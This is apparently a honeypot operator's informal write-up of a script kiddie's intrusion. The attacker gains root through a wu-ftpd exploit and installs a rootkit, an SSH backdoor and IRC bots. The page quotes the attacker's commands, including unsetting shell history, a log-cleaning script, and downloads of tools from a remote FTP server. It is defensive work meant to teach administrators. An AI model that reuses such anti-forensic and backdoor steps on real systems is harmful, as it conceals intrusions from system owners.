Cinder The third kiddie to enter my realm calls himself Cinder. He seems to be an Italian kiddo. On July 7th, at 19:55, Cinder connects to port 21 of my honeypot. After running the 7530wurm exploit (see the page about MiCrobul) which gave him immediate root-access, he grabs a .tgz file from his ftp-space at interfree.it. unset HISTFILE After untarring the kit he installs it with a simple ./install. It contains trojanned binaries 'crontab', 'df', 'dir', 'du', 'find', 'vdir', 'ifconfig', 'in.telnetd', 'killall', 'ls', 'netstat', 'ps', 'pstree', 'syslogd' and 'tcpd', a backdoor SSHD and the Adore kernel module. 'akit' stands for Akira kit, from the install: # Hello. As you can see, it's just written a few months ago. I will put it online in a few days for your education. Anyway.. with this installed all his incoming telnets and ssh connections are invisible, as are his psybnc, eggdrop, dsniff, sshd, etc. Let's take a look at the logs I hide for him >:) At 20:17, not much after cracking the box, Cinder connects to his backdoor sshd on port 20673: [root@hostname /root]# unset HISTFILE usage ./illusion <string/ip/user> <on/off> [root@hostname .. cin]# ./illusion
195 on First, he hides his tracks, by unsetting the shell's history and using 'illusion'. Illusion is a shellscript which cleans logs. So Cinder cleaned all the logged lines containing '195'. After covering his tracks he checks if his connection and processes are hidden: [root@hostname .. cin]# netstat [root@hostname .. cin]# ps
-aux No kiddo can ever hack a box without installing some IRC-related programs. Cinder just neeeeds his eggdrops. [root@hostname .. cin]# wget ftp://CinderVII:CENSORED@213.158.72.39/eggdrop1.6.2.tar.gz After configuring the just-downloaded eggdrop he tries to run it: [root@hostname eggdrop1.6.2]
# ./eggdrop -m eggdrop2 Too bad dude, no tcl around. No worries for Cinder, he continues his siege, just as if the eggdrop was running fine. Not that running eggdrops has high priority when wu-ftpd is still vulnerable. [root@hostname eggdrop1.6.2]#
cd .. How nice, he fixes my broken wu-ftpd. I should be very thankful for that. No sshd, imapd or bind to patch though. Anyway, now he's save. Time to install psybnc! [root@hostname .. cin]# lynx ftp://CinderVII:CENSORED@213.158.72.39/psyBNC2.2.1-linux-i86-static.tar.gz Well.. that's that. A running psybnc connected to IRCnet. The channel he's on seems to be a private channel where he stores his bouncers and eggdrops. Mighty useful if you ask me. Ofcourse he needs to check out if his new cracked box can run mirkforces too. Well, sorry, it won't work. First, I don't forward incoming packets for any other addresses in the honeypot's subnet. Secondly, my ISP's router won't even know those extra 252 ip's are there, since the box is on my LAN. Third, I firewall.
It's July 8th, 17:36 CEST now, I just read the mail abuse@interfree.it sent me as a reply to my abuse-mail about Cinder's hacking tools stored on their FTP. This was the reply: (sorry for my poor english) This user has been removed. Distinti Saluti Let's hope he doesn't have a backup :) ... I've put up a page which explains some tools Cinder uses. It takes a lot of time to 'analyse' them, so there's not much to see just now. But anyway, here's the page, have fun. (July 15th, 20:47 CEST. Just a note that I'm still updating the explanation of Cinder's tools. You can see some stuff about a rootkit for IRIX there now, as well as other things. I also got a mail back from Cinder's ISP. I quote: due disciplinary measures about our customer are on the way. ) (July 15th, 23:40 CEST. Wrote a little explanation about edenkitbsd.tar.gz).
I think honeypot 2 was a success. I got hold of many tools the standard scriptkiddie uses, pestered the kiddo a bit, had fun. I think the explanations you can read on this page may be useful for those who don't know much about how kiddies operate. Besides that, I wasn't able to find much info on google about the kits I explained. This means that I might well be the first to explain them. Not that I want to be the first to boost my ego, no, it might be useful for other people to learn and do something with that knowledge. With simple counter-measures this hack would be easily detected. Now if only all sysadmins had some clue..
|